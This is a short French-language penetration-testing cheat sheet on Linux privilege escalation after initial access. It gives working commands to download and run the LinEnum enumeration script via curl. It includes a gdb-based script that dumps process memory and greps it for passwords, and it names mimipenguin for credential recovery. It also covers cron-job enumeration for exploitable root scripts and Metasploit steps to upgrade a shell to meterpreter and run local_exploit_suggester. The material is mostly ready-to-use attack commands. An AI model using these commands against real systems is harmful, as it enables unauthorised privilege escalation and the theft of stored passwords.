Voir l’information qui peut nous permettre d’escalader nos privilèges vers un shell administrateur
# curl -o /LinEnum https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# bash ./linEnum -r /tmp/report
Vérifier les protections utilisés
https://raw.githubusercontent.com/germainm/check_linux_defenses/main/enumerate_linux_defenses.sh
Extraire la mémoire d’un processus à la recherche de mots de passe
#!/bin/bash
#./dump-memory.sh <PID>
grep rw-p /proc/$1/maps \
| sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \
| while read start stop; do \
gdb --batch --pid $1 -ex \
"dump memory $1-$start-$stop.dump 0x$start 0x$stop"; \
done
./dump-memory.sh <PID>
strings *.dump | grep -i password
mimipenguin peut retourver les mots de passe ( GDM password, Gnome Keyring, LightDM, VSFTPd, Apache2, OpenSSH )
Vérifier si les tâches schédulées sont vulnérables. Vous pouvez peut-être exploiter un script exécuté en tant qu’administrateurs (vulnérabilité wildcard (*), possibilité de créer des fichiers que le script pourrait utiliser, liens symboliques)
crontab -l
ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
D’autres outils comme lynis ou LinPEAS peuvent être utilisés
Voir aussi https://gtfobins.github.io et https://lolbas-project.github.io/ pour des idées d’utilitaires qui peuvent être utilisés pour avoir plus d’accès qu’initialement prévu.
Pour trouver des exploits avec metasploit, il faut d’abord upgrader la session en meterpreter. Pour se faire, nous mettons la session en background avec ctrl+z. Avec “sessions”, nous obtenons l’identifiant associé à la session. Par la suite, sessions -u id.Une nouvelle session sera crée. Par la suite, nous pouvons faire à nouveau un listing des sessions avec “sessions”. Par la suite, nous pouvons utiliser le module local_exploit_suggeste et régler le paramètre session avant de faire la recherche d’exploits.
use post/multi/recon/local_exploit_suggester
set session 2
run